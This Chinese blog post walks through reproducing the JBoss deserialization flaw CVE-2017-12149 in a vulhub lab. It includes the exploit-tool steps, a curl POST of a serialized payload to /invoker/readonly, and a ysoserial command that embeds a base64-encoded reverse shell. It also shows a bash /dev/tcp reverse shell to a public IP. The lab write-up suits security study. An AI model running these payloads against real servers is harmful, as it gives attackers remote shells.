zoukankan      html  css  js  c++  java
  • JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)复现

    0x00 漏洞介绍

    该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
    该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

    image.png

    0x01 环境搭建

    vulhub上一键搭建:https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

    image.png

    0x02漏洞复现

    方法一:现成的exp工具

    git clone https://github.com/yunxu1/jboss-_CVE-2017-12149
    image.png

    (请忽略虚拟机乱码问题)

    方法二:使用JavaDeserH2HC工具

    进入JavaDeserH2HC工作目录:

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
    java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口
    此时会在当前目录生成ReverseShellCommonsCollectionsHashMap.ser二进制文件
    curl http://127.0.0.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
    

    反弹shell:

    image.png

    方法三:常规方法

    漏洞是因为接口/invoker/readonly将用户传入的post数据进行了反序列化导致的,所以我们先来构造反序列化语句。

    编写反弹shell语句

    bash -i >& /dev/tcp/49.233.44.168/12345 0>&
    程序是java的,Runtime.getRuntime().exec()语句中不能包含管道符等,所以需要将反弹shell语句编码
    编码网站:http://www.jackson-t.ca/runtime-exec-payloads.html

    image.png

    利用ysoserial 生成反序列化语句

    java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
    

    通过POST包发送poc,右键paste from file将生成的poc.ser文件导入post包:
    image.png

    反弹shell
    image.png

  • 相关阅读:
    《Linux网络安全技术与实现》学习
    OpenGL数据可视化
    CAPWAP简介
    《大话设计模式》学习小结
    《Python数据可视化编程实战》学习总结
    BufferedReader,缓冲输入字符流
    字符流拷贝图片,丢失数据的原因?
    reader,字符流
    BufferedInputSream和BufferedOutputSream,,,
    FileOutputSream
  • 原文地址:https://www.cnblogs.com/ffx1/p/12653543.html
Copyright © 2011-2022 走看看